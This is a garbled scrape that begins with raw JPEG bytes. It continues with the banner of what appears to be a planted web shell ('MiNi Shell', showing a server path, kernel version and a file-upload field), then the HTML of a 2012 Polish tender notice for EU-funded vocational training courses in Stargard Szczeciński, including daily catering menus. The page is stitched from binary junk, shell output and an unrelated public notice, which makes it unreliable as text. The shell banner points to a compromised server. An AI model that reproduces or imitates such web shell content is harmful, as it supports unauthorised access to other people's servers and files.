JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120803/284208-N-2012.html

<p class="kh_header"><b>Stargard Szczeciński: Organizacja i przeprowadzenie w 2012 roku szkoleń realizowanych przez Miejski Ośrodek Pomocy Społecznej w Stargardzie Szczecińskim w ramach partnerskiego Projektu systemowego Integracja społeczna w powiecie stargardzkim współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 284208 - 2012; data zamieszczenia: 03.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Warszawska 9a, 73-110 Stargard Szczeciński, woj. zachodniopomorskie, tel. 91 578 45 83, faks 91 577 00 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.stargard.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie w 2012 roku szkoleń realizowanych przez Miejski Ośrodek Pomocy Społecznej w Stargardzie Szczecińskim w ramach partnerskiego Projektu systemowego Integracja społeczna w powiecie stargardzkim współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie w 2012 roku szkoleń realizowanych przez Miejski Ośrodek Pomocy Społecznej w Stargardzie Szczecińskim w ramach partnerskiego Projektu systemowego Integracja społeczna w powiecie stargardzkim współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na szkolenie. Zamówienie realizowane będzie w formie szkoleń w zakresach tematycznych, z których każdy stanowi odrębną część: Część 1 - Kierowca wózka jezdniowego z obsługą kas fiskalnych Część 2 - Nowoczesny sprzedawca z obsługą kas fiskalnych Część 3 - Kucharz małej gastronomii Część 4 - Kurs prawa jazdy kat. B..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 17.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy mają obowiązek złożyć następujące dokumenty: oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru, stanowiącego załącznik nr 3 do siwz. O zamówienie mogą się ubiegać Wykonawcy którzy posiadają wpis do Rejestru Instytucji Szkoleniowych zgodnie z art. 20 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004r. (Dz. U z 2008. Nr 69, poz. 415 z późn. zm.)oraz w przypadku Wykonawców składających ofertę na część nr 4 Kurs prawa jazdy kat. B wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców, zgodnie z art. 103 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2005 r Nr 108, poz. 908 z późn. zm.)). Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy mają obowiązek złożyć następujące dokumenty: oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru, stanowiącego załącznik nr 3 do siwz oraz oświadczenie według wzoru stanowiącego załącznik nr 4 do siwz. O zamówienie mogą ubiegać się Wykonawcy którzy wykażą, że wykonali lub wykonują należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 zamówienia/ usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy mają obowiązek złożyć następujące dokumenty: oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru, stanowiącego załącznik nr 3 do siwz. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy mają obowiązek złożyć następujące dokumenty: oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru, stanowiącego załącznik nr 3 do siwz oraz oświadczenie stanowiące załącznik nr 5 do siwz. O zamówienie mogą ubiegać się Wykonawcy którzy wykażą, że osoby uczestniczące w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy mają obowiązek złożyć następujące dokumenty: oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru, stanowiącego załącznik nr 3 do siwz. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oferta cenowa zgodnie z Rozdziałem II pkt 3 siwz; w przypadku składania oferty wspólnej, należy złożyć jeden dokument, 2) odpowiednie pełnomocnictwa; tylko w sytuacjach określonych w Rozdziale II pkt 5 zdanie 2 siwz lub w przypadku składania oferty wspólnej (Rozdział IV pkt 1 siwz),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://mops.stargard.pl/index.php?go=osrodek/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Stargardzie Szczecińskim ul. Warszawska 9a 73-110 Stargard Szczeciński.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 11:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Stargardzie Szczecińskim ul. Warszawska 9a 73-110 Stargard Szczeciński pok. 47 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Partnerski projekt systemowy Integracja społeczna w powiecie stargardzkim realizowany przez Miejski Ośrodek Pomocy Społecznej w Stargardzie Szczecińskim jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kierowca wózka jezdniowego z obsługą kas fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Realizacja kursu Kierowca wózka jezdniowego z obsługą kas fiskalnych dla 8 osób odbywać się będzie w terminie od 17 września 2012r. do 5 października 2012r. , zgodnie z załączonym harmonogramem.
2.	Dzienny wymiar zajęć nie powinien przekroczyć 8 godzin zegarowych  z uwzględnieniem przerw, w tym jednej 20-sto minutowej na spożycie ciepłego posiłku.
3.	Ilość godzin szkolenia - 120 godzin/os.
4.	Miejsce realizacji szkolenia - pomieszczenia na terenie miasta Stargard Szczeciński. 
5.	Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż. 
6.	Szkolenie powinno być przeprowadzone w oparciu o program zatwierdzony pod względem merytorycznym przez najbliższy terytorialnie Urząd Dozoru Technicznego lub program równoważny.
7.	Osoby skierowane na szkolenie będą posiadały zaświadczenie lekarza medycyny pracy i orzeczenie psychologiczne o braku przeciwwskazań do wzięcia udziału w kursie i wykonywania zawodu kierowcy wózków jezdniowych z napędem silnikowym, na które Zamawiający skieruje uczestników w ramach realizacji projektu.
8.	Szkolenie dot. obsługi wózków jezdniowych powinno zawierać, m.in.:
-	zajęcia teoretyczne - 44h/os., (typy wózków jezdniowych, budowa i eksploatacja),
-	praktyczną naukę jazdy wózkami - 60h/os. (Zamawiający dopuszcza podział na grupy pod warunkiem, że ilość godzin szkoleniowych na grupę, a tym samym na osobę nie będzie mniejsza niż 60 godzin)
-	moduł: wymiana butli gazowych  - 8h/os. (teoria i praktyka),
- kasy fiskalne - 8h/os.
9.	Wykonawca każdemu z uczestników zapewnia swobodne wykonywanie ćwiczeń praktycznych.
10.	Wykonawca zobowiązany jest ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków.
11.	Szkolenie musi zakończyć się egzaminem przed komisją Urzędu Dozoru Technicznego. W całkowitym koszcie szkolenia należy uwzględnić egzamin zewnętrzny przed komisją Urzędu Dozoru Technicznego.
12.	Wykonawca zobowiązany jest zapewnić uczestnikom konieczne materiały szkoleniowe (prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis, ołówek z gumką - w tym jeden komplet do dokumentacji projektu), harmonogram szkolenia oraz przerwy kawowe (herbata , kawa, napoje zimne, ciastka, woda, soki, owoce), jak również catering, tj. ciepły posiłek w dniach w których będą realizowane zajęcia teoretyczne z zastosowaniem poniższego menu dla tych dni:
- 17.09.12r. - kotlety mielone wieprzowe-150g, ziemniaki z wody-300g, surówka z kapusty 
                        czerwonej 150g.
- 18.09.12r. - gulasz wołowy 250g, kasza-200g, sałatka z kapusty pekińskiej 150g.
- 19.09.12r. - kotlet schabowy bez kości-150g, ziemniaki z wody-300g, surówka z marchewki 
                        i jabłek 150g.
- 20.09.12r. - filet z ryby smażonej-200g, ziemniaki z wody 300g, surówka z kiszonej             
                        kapusty-150g.
- 21.09.12r. - naleśniki z serem-450g.
- 24.09.12r. - kotlet z mięsa mielonego drobiowego-200g, ziemniaki z wody-300g, ogórek 
                        konserwowy-120g.
- 25.09.12r. - bitki z indyka lub szynki wieprzowej-150g, ziemniaki z wody-300g, sałatka 
                       z buraczków 150g.
- 26.09.12r. - ryż lub makaron na słodko z owocami-450g.
- 27.09.12r. - filet z kurczaka panierowany-160g, ziemniaki z wody-300g, marchewka 
                       zasmażana-150g.
- 28.09.12r. - pierogi ruskie-370g.
- 01.10.12r. - kopytka-225g, klopsiki z indyka w sosie pieczarkowym-150g, surówka z kapusty 
                        pekińskiej-150g.
- 02.10.12r. - gołąbki w sosie pomidorowym-490g.
- 03.10.12r. - kasza gryczana gotowana-150g, gulasz wieprzowy-135g, ogórek kiszony-120g.
- 04.10.12r. - schab duszony-120g, ziemniaki z wody-300g, buraczki czerwone-150.
- 05.10.12r. - filet mintaj w panierce-250g, ziemniaki z wody-300g, surówka z białej kapusty i   
                        jabłek-120g.


13.	Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013.
14.	Zajęcia w ramach kursu zrealizują nauczyciele/instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe.
15.	 W przypadku zlecenia organizacji i realizacji kursu, wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły                 z egzaminów.  Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu.
16.	Wykonawca wyda pisemną opinię o każdym uczestniku biorącym udział w szkoleniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 17.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nowoczesny sprzedawca z obsługą kas fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Realizacja kursu Nowoczesny sprzedawca dla 12 osób odbywać się będzie w terminie od 17 września 2012r. do 2 października 2012r. , zgodnie z załączonym harmonogramem. Celem szkolenia jest przyuczenie do zawodu sprzedawcy - handlowca, z umiejętnością obsługi kasy fiskalnej oraz programu do fakturowania. Przygotowywanie uczestników szkolenia, m.in.  w zakresie: przestrzegania zasad bezpieczeństwa i higieny pracy, organizacji handlu w gospodarce rynkowej, organizacji sprzedaży detalicznej, wykonywania i dokumentowania podstawowych obliczeń sklepowych,  poznania przez słuchaczy teoretycznych zagadnień związanych ze stosowaniem kas fiskalnych i terminali płatniczych oraz oprogramowania do fakturowania, opanowania praktycznej obsługi kasy i terminali,  nabycia wiedzy z zakresu wymagań sanitarnych w handlu. Szkolenie powinno być zorganizowane z wykorzystaniem modułowego programu szkolenia zawodowego dla zawodu sprzedawca (kod zawodu 522107) dostępnego w bazie danych prowadzonej przez Ministra Pracy i Polityki Społecznej.
2.	Dzienny wymiar zajęć nie powinien przekroczyć 7 godzin zegarowych z uwzględnieniem przerw, w tym jednej 20-sto minutowej na spożycie ciepłego posiłku.
3.	Ilość godzin szkolenia - 80 godzin/os.
4.	Miejsce realizacji szkolenia - pomieszczenia na terenie miasta Stargard Szczeciński. 
5.	Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż. 
6.	Wykonawca zapewnia: przerwy kawowe  (kawa, herbata, ciasteczka, cukier, śmietanka, woda, soki, owoce, itp.), catering - tj. ciepły posiłek w dniach:

- 17.09.12r. - kotlety mielone wieprzowe-150g, ziemniaki z wody-300g, surówka z kapusty 
                        czerwonej 150g.
- 18.09.12r. - gulasz wołowy 250g, kasza-200g, sałatka z kapusty pekińskiej 150g.
- 19.09.12r. - kotlet schabowy bez kości-150g, ziemniaki z wody-300g, surówka z marchewki 
                        i jabłek 150g.
- 20.09.12r. - filet z ryby smażonej-200g, ziemniaki z wody 300g, surówka z kiszonej             
                        kapusty-150g.
- 21.09.12r. - naleśniki z serem-450g.
- 24.09.12r. - kotlet z mięsa mielonego drobiowego-200g, ziemniaki z wody-300g, ogórek 
                        konserwowy-120g.
- 25.09.12r. - bitki z indyka lub szynki wieprzowej-150g, ziemniaki z wody-300g, sałatka 
                       z buraczków 150g.
- 26.09.12r. - ryż lub makaron na słodko z owocami-450g.
- 27.09.12r. - filet z kurczaka panierowany-160g, ziemniaki z wody-300g, marchewka 
                       zasmażana-150g.
- 28.09.12r. - pierogi ruskie-370g.
- 01.10.12r. - kopytka-225g, klopsiki z indyka w sosie pieczarkowym-150g, surówka z kapusty 
                        pekińskiej-150g.
- 02.10.12r. - gołąbki w sosie pomidorowym-490g.

7.	Wykonawca zapewnia także: materiały szkoleniowe (w tym jeden dodatkowy do dokumentacji projektu), egzamin wewnętrzny i wydanie zaświadczenia o ukończeniu szkolenia oraz  wykonanie minimum sanitarnego z elementami HACCP i badaniami do celów sanitarno- epidemiologicznych (książeczka zdrowia).
8.	Wykonawca zobowiązany jest ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków.
9.	Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013
10.	Zajęcia w ramach kursu zrealizują nauczyciele/instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe.
11.	W przypadku zlecenia organizacji i realizacji kursu, wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły              z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu.
12.	Wykonawca wyda pisemną opinię o każdym uczestniku biorącym udział w szkoleniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 17.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Realizacja kursu Kucharz małej gastronomii dla 5  osób odbywać się będzie w terminie        od 17 września  2012r. do 5 października 2012r., zgodnie z załączonym harmonogramem.  Celem szkolenia jest przyuczenie do zawodu kucharza małej gastronomii. Przygotowywanie uczestników szkolenia, m.in. w zakresie: 
 - przygotowania materiałów do produkcji podstawowego asortymentu potraw i napojów w małej gastronomii,
- sporządzania podstawowego asortymentu potraw i napojów w małej gastronomii,
- dobierania i posługiwania się sprzętem oraz obsługiwanie maszyn i urządzeń w małej gastronomii,
- przyjmowania, przechowywania, wydawania produktów spożywczych, półproduktów i innych artykułów w małej gastronomii,
- oceniania jakościowego surowców, półproduktów i potraw w małej gastronomii,
